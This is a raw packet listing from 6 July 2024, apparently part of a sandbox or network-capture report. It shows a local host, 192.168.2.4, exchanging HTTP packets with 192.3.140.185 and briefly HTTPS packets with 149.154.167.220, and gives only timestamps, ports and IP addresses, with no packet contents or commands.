Jul 6, 2024 13:27:19.793523073 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.793555021 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.793585062 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.845365047 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.845412016 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.845422983 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.845433950 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.845484018 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.845487118 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.845531940 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.845542908 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.845581055 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.845606089 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.845657110 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.845668077 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.845722914 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.845740080 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.845776081 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.845824957 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.845899105 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.845941067 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.845952034 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.846086025 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.846096992 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.846108913 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.846139908 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.846194029 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.846215963 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.846229076 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.846324921 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.846385002 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.846467018 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.846477032 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.846506119 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.846518040 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.846524000 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.846553087 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.846663952 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.846676111 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.846685886 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.846698046 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.846709967 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.846714020 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.846730947 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.846750975 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.846995115 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.847064018 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.847074032 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.847117901 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.847117901 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.847129107 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.847141027 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.847166061 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.847186089 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.847287893 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.847300053 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.847311020 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.847323895 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.847366095 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.847388983 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.847393990 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.847716093 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.847763062 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.847768068 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.847780943 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.847816944 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.847842932 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.847938061 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.847949982 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.847960949 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.847973108 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.848001957 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.848072052 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.848134041 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.848145962 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.848156929 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.848170996 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.848202944 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.848267078 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.848279953 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.848320007 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.848651886 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.848720074 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.848743916 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.848754883 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.848829985 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.848886967 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.848982096 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.848994017 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.848994017 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.849006891 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.849020004 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.849035978 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.849066019 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.849108934 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.849122047 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.849133015 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.849145889 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.849158049 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.849159956 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.849180937 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.850617886 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.850641012 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.850652933 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.850672960 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.850703001 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.850714922 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.850719929 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.850759983 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.850810051 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.850821972 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.850832939 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.850866079 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.850893021 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.850910902 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.850922108 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.850966930 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.885624886 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.885680914 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.885693073 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.885744095 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.885749102 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.885761976 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.885772943 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.885802984 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.885819912 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.937413931 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.937455893 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.937468052 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.937530994 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.937534094 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.937544107 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.937556028 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.937581062 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.937602043 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.937764883 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.937828064 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.937839031 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.937889099 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.937988043 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.937999964 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938011885 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938024044 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938031912 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.938043118 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938062906 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.938096046 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938097000 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.938107967 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938149929 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.938263893 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938280106 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938292027 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938306093 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938325882 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.938354969 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.938425064 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938437939 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938447952 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938460112 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938467979 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.938472033 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938486099 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938513041 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.938539028 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.938606024 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938684940 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938697100 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938708067 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938719988 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938730955 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938747883 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.938779116 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.938915968 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938927889 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938939095 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938951969 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938963890 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.938965082 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.938986063 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.939207077 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939217091 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939229012 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939239025 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939256907 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939266920 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.939269066 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939282894 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939294100 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939304113 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.939307928 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939320087 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939331055 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939332962 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.939343929 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939351082 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.939356089 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939367056 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.939400911 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.939733028 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939754009 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939765930 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939776897 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939789057 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939800024 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939810991 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939820051 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.939822912 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939837933 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939848900 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939857006 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.939862013 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939870119 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.939876080 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939882040 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.939889908 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939908028 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939920902 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.939948082 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.939980984 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.940543890 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.940560102 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.940573931 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.940584898 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.940597057 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.940608978 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.940613985 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.940620899 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.940639019 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.940639019 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.940653086 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.940664053 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.940665007 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.940679073 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.940692902 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.940702915 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.940706015 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.940717936 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.940736055 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.940747023 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.941191912 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941204071 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941215038 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941231966 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941243887 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941255093 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941260099 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.941267014 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941281080 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941293955 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941299915 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.941313028 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.941334009 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.941479921 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941493034 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941503048 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941514969 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941526890 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941540003 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941541910 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.941554070 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941570997 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.941574097 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941589117 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941595078 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.941603899 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941617966 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.941621065 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941636086 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941649914 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941654921 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.941663980 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.941682100 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.941711903 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.977961063 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.977984905 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.977996111 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.978033066 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.978111982 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.978123903 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.978135109 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.978146076 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.978147984 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.978158951 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:19.978183031 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:19.978215933 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:20.006970882 CEST	443	49751	149.154.167.220	192.168.2.4
Jul 6, 2024 13:27:20.007045984 CEST	49751	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:27:20.011471987 CEST	49751	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:27:20.011482000 CEST	443	49751	149.154.167.220	192.168.2.4
Jul 6, 2024 13:27:20.011713028 CEST	443	49751	149.154.167.220	192.168.2.4
Jul 6, 2024 13:27:20.029803991 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:20.029817104 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:20.029828072 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:20.029840946 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:20.029851913 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:20.029864073 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:20.029890060 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:20.029901981 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:20.029907942 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:20.029925108 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:20.029953957 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:20.029994965 CEST	49750	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:20.034751892 CEST	80	49750	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:20.163029909 CEST	49751	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:27:20.465454102 CEST	49751	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:27:20.466789007 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:20.471573114 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:20.471662998 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:20.471851110 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:20.476982117 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:20.508503914 CEST	443	49751	149.154.167.220	192.168.2.4
Jul 6, 2024 13:27:20.668344021 CEST	443	49751	149.154.167.220	192.168.2.4
Jul 6, 2024 13:27:20.668440104 CEST	443	49751	149.154.167.220	192.168.2.4
Jul 6, 2024 13:27:20.668517113 CEST	49751	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:27:20.683685064 CEST	49751	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:27:21.049598932 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.049614906 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.049626112 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.049675941 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.049675941 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.049685955 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.049695969 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.049709082 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.049710989 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.049730062 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.049774885 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.049812078 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.050611973 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.050687075 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.050896883 CEST	49752	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:21.054711103 CEST	80	49752	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:21.054768085 CEST	80	49752	192.3.140.185	192.168.2.4
